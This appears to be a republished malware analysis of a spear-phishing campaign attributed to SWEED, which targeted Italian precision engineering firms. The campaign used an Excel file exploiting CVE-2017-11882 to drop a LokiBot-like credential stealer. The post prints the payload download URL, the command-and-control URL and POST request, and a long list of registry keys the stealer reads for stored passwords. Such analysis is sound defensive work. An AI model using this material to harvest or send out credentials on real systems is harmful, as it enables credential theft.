Security expert Marco Ramilli published a quick analysis of an interesting attack carried out by SWEED threat actor targeting precision engineering firms in Italy.

Introduction

Today I’d like to share a quick analysis of an interesting attack targeting precision engineering companies based in Italy. Precision engineering is a very important business market in Europe, it includes developing mechanical equipment for: automotive, railways, heavy industries and military grade technology . The attacker pretended to be a customer and sent to the victim a well crafted email containing a Microsoft XLS file including real spear-parts codes, quantities and shipping addresses. A very similar attack schema to MartyMCFly campaign.

Technical Analysis

Hash 863934c1fa4378799ed0c3e353603ba0bee3a357a5c63d845fe0d7f4ebc1a64c Threat Microsoft Excel Document Brief Description Exploiter, Dropper and Executor targeting precision engineering companies Ssdeep 384:janC18qmTUKhKVxbo6JpM2gwmeJxQrHwFeDtug/uND40C2D:janCOqm4tVxE6rM2g0fO2exuxC0FD

On 2019-10-26 a well-crafted email coming from steel@vardhman.com asking for an economic proposal reached specific email boxes belonging to purchasing department of a well-known precision engineering company. Basically the attacker asks to the victims to quote the entire list of spear-parts included in an attached Excel document. The source address looks like genuine since belonging to a big company working in the textile field which frequently uses precision equipment machines in its production chain.

Attacker Spreadsheet looking real

Once the victim opens up the document it would actually see a “looking real” Microsoft Excel spreadsheet. Surprisingly the spreadsheet doesn’t hold Macro code, so no weird message would appear and no weird requests for enabling macros or compatibility-mode would appear on the victim screen. Everything looks like real except for the third object included into the Excel file.

Object-3 exploiting CVE-2017-11882.

If you are familiar with CVE-2017-11882, you might notice it immediately, but if you aren’t you might take a look to HERE (for the exploit generation) to HERE (for an example) and HERE (for CVE original disclosure). In a nutshell CVE-2017-11882 is a 17-year old memory corruption issue in Microsoft Office (including Office 360). When exploited successfully, it can let attackers execute remote code on a vulnerable machine—even without user interaction—after a malicious document is opened. The flaw resides within Equation Editor (EQNEDT32.EXE), a component in Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents.

Once the victim opens the document apparently nothing happens but silently Object3 runs EquationEditor and exploits a memory corruption vulnerability executing code on the running host.

Equation Editor Crashes and Execute Code

The code execution implements a romantic Drop and Execute code by dropping a Windows PE file from: http[://mail.hajj.zeem.sa/wp-admin/edu/educrety.exe and by running it directly on memory exploiting fileless behavior.

Analysis of Dropped PE File

Hash 64114c398f1c14d4e840f62395edd9a8c43d834708f8d8fce12f8a6502b0e981 Threat Sensitive data stealer Brief description Looks for stored passwords and tries to push them on command and control servers Ssdeep 6144:htbOljxWyjJypr+QqhdJdUwcPWFNEwXh/XEVOwG6Fro:h9OXByoXLU7eFNEwREVOJv

educrety.exe

The dropped PE (educrety.exe) is compiled by Microsoft Visual C++ and holds an nice icon :P. According to VT history detection the same hash has been seen with at least three different names: educrety.exe , prestezza.exe and cardsharper.exe . ExifTools shows that prestezza.exe is the original file name while the project internal name is: cardsharper.exe. Once the sample is run it harvests information from many registry keys in where vendors are used to save access credentials or access tokens. For example (or for full read RegKeys have a look to here):

[...] HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\092aab115f965648a37b74181b1110f0 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\092aab115f965648a37b74181b1110f0\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\77de0b05e2a16d4fb6c76bf01ccd1603 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\77de0b05e2a16d4fb6c76bf01ccd1603\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\79e73bb51ce14d4a82e1f99654d0fc40 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\79e73bb51ce14d4a82e1f99654d0fc40\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8a1c49cb145d7448927a71ec9112e8a4 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8a1c49cb145d7448927a71ec9112e8a4\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Server HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP User Name HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP User HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Server HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 User Name HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 User HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Email Address HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP User Name HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Server HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Server HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP User Name HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP User HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP User HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP Server URL HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail User Name HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail Server HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Port HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Port HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Port HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Password2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Password2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTPMail Password2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Password2 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\POP3 Password HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\IMAP Password HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\NNTP Password HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\HTTP Password HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000005\SMTP Password HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ba01e474e967cd44b1abf533b2f10f52 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ba01e474e967cd44b1abf533b2f10f52\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\d8795abf811b0f4ea6b2bf0a97c4cb21 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\d8795abf811b0f4ea6b2bf0a97c4cb21\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper [...]

Once it gets credentials it pushes them on a command and control: http[://www.corpcougar.com/edu/Panel/five/fre.php in the following way

POST /edu/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: www.corpcougar.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: EEABFA Content-Length: 190 Connection: close

Network Trace

Considering the User-Agent, the net-trace and most of all the pushing path, it reminds me LokiBot Malware. “Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.” – PhishMe. Playing a little bit with command and control it turns out more than one Command an Control was installed on the same domain, each one owns different path and the sample I’ve analyzed was currently using only one path. It makes sense since VT collected different samples related to the analyzed one which would probably include different malware campaigns and different artifact names.

IndexOf C&C

ATT&CK TTP Summary

Following MITRE ATT&CK compiled according to what find.

I nitial Access : T1193 (Spearphishing Attachment)

: T1193 (Spearphishing Attachment) Execution : T1204 ( User Execution )

: T1204 ( User Execution ) Defense Evasion : T1107 (File Deletion – deletes original file after infection) T1158: Hidden Files and Directories T1045: Software Packing – threat comes packed/encrypted

: Credential Access : T1003: Credential Dumping T1081: Credentials in Files T1214: Credentials in Registry

: Collection : T1005: Data from Local System

: T1005: Data from Local System Exfiltration : T1002: Data Encrypted

: T1002: Data Encrypted Command and Control : T1043: Commonly Used Port T1071: Standard Application Layer Protocol

:

Conclusions

According to Cisco Talos (here and here) a large number of ongoing malware distribution including such notable malware as Formbook, Lokibot and Agent Tesla could be related to a singular thread actor called “SWEED”. I did find many similarities including original attack vectors, used Microsoft Office Exploit, implementation of LokiBot and victims type to “SWEED” so that I believe this attack could also be attributed to the same threat actor. Moreover the used techniques and the care of the overall attack, which included a study on the victim products (you remember the real spear-parts in the excel file ?) reminds me a more recent analysis made by Fortinet so that I believe it might be attributed to the same threat actor as well as the described attack.

Finally I think “SWEED” threat actor is attacking Italian precision engineering companies. TTPs and communication schema are so close each other that it’s hard to believe in fortuity.

The original post, including IoCs and Yara rules, is available on Marco Ramilli’s blog:

Pierluigi Paganini